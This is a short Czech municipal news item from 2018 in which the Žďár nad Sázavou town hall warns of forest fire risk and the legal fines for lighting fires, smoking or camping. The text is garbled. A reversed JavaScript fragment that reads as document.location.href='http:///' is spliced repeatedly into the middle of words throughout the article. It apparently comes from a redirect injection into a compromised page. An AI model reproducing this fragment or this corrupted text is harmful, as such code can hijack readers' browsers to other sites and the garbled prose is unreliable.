Rainbow page separator

Ve Žďáře varují před rizikem požárů, za přestupek hrozí sankce

Pátek, 3. srpna 2018

Žďár nad Sázavou / Žďárská radnice upozorňuje návštěvníky lesů, ale i volné krajiny na vážné riziko požárů, které aktuálně hrozí zejména v lesních porostech v souvislosti s dlouhodobým suchým a teplým počasím. Vyvarovat by se pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to v těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to místech měli především kouření, rozdělávání ohňů a třeba i vaření na přenosných vařičích, od nichž by se při poryvu větru mohla vznítit suchá tráva.
„Lesní zákon zakazuje rozdělávat otevřené ohně, kouřit, odhazovat doutnající předměty a tábořit v lesích. Zákon o ochraně přírody zase zakazuje tábořit a rozdělávat ohně mimo vyhrazená místa v Chráněné krajinné oblasti Žďárské vrchy. Porušení těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to zákazů je sankcionováno podle zákona,“ informoval vedoucí odboru životního prostředí žďárského městského úřadu Jaroslav Doubek a tím, že maximální finanční postih za porušení může být až s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to tisíc korun. „Upozorňujeme na nebezpečí požárů a žádáme o bezpodmínečné dodržování zákazů. Následky jejich porušení [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totiž mohou být nedozírné, o čemž vypovídají i požáry v mnoha částech Evropy,“ doplnil Doubek.